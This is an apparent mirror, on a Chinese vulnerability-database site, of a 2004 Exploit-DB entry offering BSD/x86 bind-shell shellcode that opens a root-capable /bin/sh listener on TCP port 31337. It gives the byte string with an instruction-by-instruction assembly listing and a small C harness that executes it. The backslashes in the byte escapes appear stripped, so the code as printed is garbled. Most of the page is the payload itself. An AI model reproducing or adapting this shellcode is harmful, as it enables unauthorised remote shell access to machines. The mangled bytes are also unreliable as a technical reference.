BSD/x86 – Bind (31337/TCP) Shell Shellcode (83 bytes)-安全小百科

BSD/x86 – Bind (31337/TCP) Shell Shellcode (83 bytes)

漏洞ID	1054688	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	BSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13248

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* portbinding execve() shellcode (port 31337) bsd/x86 (83b) - no1 (greyhats.za.net) */

char shellc0de[]=
  "x99"                        // cdq
  "x52"                        // pushl %edx 
  "x6ax01"                    // pushl $0x01
  "x6ax02"                    // pushl $0x02
  "xb0x61"                    // movb $0x61,%al
  "x50"                        // pushl %eax
  "xcdx80"                    // int $0x80
  "x52"                        // pushl %edx
  "x68xffx02x7ax69"        // pushl $0x697a02ff
  "x89xe3"                    // movl %esp,%ebx
  "x6ax10"                    // push $0x10
  "x53"                        // pushl %ebx
  "x50"                        // pushl %eax
  "x93"                        // xchg %eax,%ebx
  "x31xc0"                    // xorl %eax,%eax
  "xb0x68"                    // movb $0x68,%al
  "x50"                        // pushl %eax
  "xcdx80"                    // int $0x80
  "x53"                        // pushl %ebx
  "xb0x6a"                    // movb $0x6a,%al
  "x50"                        // pushl %eax
  "xcdx80"                    // int $0x80
  "x31xc0"                    // xorl %eax,%eax
  "x50"                        // pushl %eax
  "x50"                        // pushl %eax
  "x53"                        // pushl %ebx
  "xb0x1e"                    // movb $0x1e,%al
  "x50"                        // pushl %eax
  "xcdx80"                    // int $0x80
  "x93"                        // xchg %eax,%ebx
  "x89xc1"                    // movl %eax,%ecx
                                // looper:
  "x31xc0"                    // xor %eax,%eax
  "x51"                        // pushl %ecx
  "x53"                        // pushl %ebx
  "xb0x5a"                    // movb $0x5a,%al
  "x50"                        // pushl %eax
  "xcdx80"                    // int $0x80
  "x49"                        // decl %ecx
  "x79xf4"                    // jns looper
  "x50"                        // pushl %eax
  "x68x2fx2fx73x68"        // pushl $0x68732f2f
  "x68x2fx62x69x6e"        // pushl $0x6e69622f
  "x89xe3"                    // movl %esp,%ebx
  "x50"                        // pushl %eax
  "x54"                        // pushl %esp
  "x53"                        // pushl %ebx
  "xb0x3b"                    // movb $0x3b,%al
  "x50"                        // pushl %eax
  "xcdx80";                   // int $0x80

int
main()
{
  void(*sc)()=(void *)shellc0de;
  printf("nportbinding execve() shellcode (port 31337) bsd/x86 (%db) - no1 (greyhats.za.net)n",strlen(shellc0de));
  sc();
  return;
}

// milw0rm.com [2004-09-26]

相关推荐: UltraEdit FTP Client Weak Password Encryption Vulnerability

UltraEdit FTP Client Weak Password Encryption Vulnerability 漏洞ID 1102954 漏洞类型 Design Error 发布时间 2001-08-23 更新时间 2001-08-23 CVE编号 N…

文章版权归作者所有，未经允许请勿转载。

THE END